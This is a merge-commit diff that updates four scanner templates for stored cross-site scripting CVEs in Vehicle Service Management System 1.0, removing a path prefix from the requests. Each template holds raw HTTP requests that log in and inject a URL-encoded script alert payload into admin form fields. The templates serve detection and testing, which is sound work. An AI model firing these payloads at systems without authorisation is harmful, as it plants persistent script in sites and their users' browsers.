Merge pull request #5285 from ritikchaddha/update-vms-template

Update vms template

cves/2021/CVE-2021-46068.yaml

@@ -22,21 +22,21 @@ info:
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
+        POST /classes/Users.php?f=save HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
 
       - |
-        GET /vehicle_service/admin/?page=user HTTP/1.1
+        GET /admin/?page=user HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

cves/2021/CVE-2021-46069.yaml

@@ -1,42 +1,42 @@
 id: CVE-2021-46069
 
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
-  reference:
-    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
-    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
-    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 4.8
-    cve-id: CVE-2021-46069
-    cwe-id: CWE-79
-  metadata:
-    verified: "true"
-  tags: cve,cve2021,xss,vms,authenticated
+info:
+  name: Vehicle Service Management System - Stored Cross Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+  reference:
+    - https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS
+    - https://www.plsanu.com/vehicle-service-management-system-mechanic-list-stored-cross-site-scripting-xss
+    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46069
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-46069
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,xss,vms,authenticated
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_mechanic HTTP/1.1
+        POST /classes/Master.php?f=save_mechanic HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1
 
       - |
-        GET /vehicle_service/admin/?page=mechanics HTTP/1.1
+        GET /admin/?page=mechanics HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

cves/2021/CVE-2021-46071.yaml

@@ -22,21 +22,21 @@ info:
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_category HTTP/1.1
+        POST /classes/Master.php?f=save_category HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1
 
       - |
-        GET /vehicle_service/admin/?page=maintenance/category HTTP/1.1
+        GET /admin/?page=maintenance/category HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true

cves/2021/CVE-2021-46072.yaml

@@ -22,21 +22,21 @@ info:
 requests:
   - raw:
       - |
-        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
+        POST /classes/Login.php?f=login HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
         username={{username}}&password={{password}}
 
       - |
-        POST /vehicle_service/classes/Master.php?f=save_service HTTP/1.1
+        POST /classes/Master.php?f=save_service HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         id=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1
 
       - |
-        GET /vehicle_service/admin/?page=maintenance/services HTTP/1.1
+        GET /admin/?page=maintenance/services HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true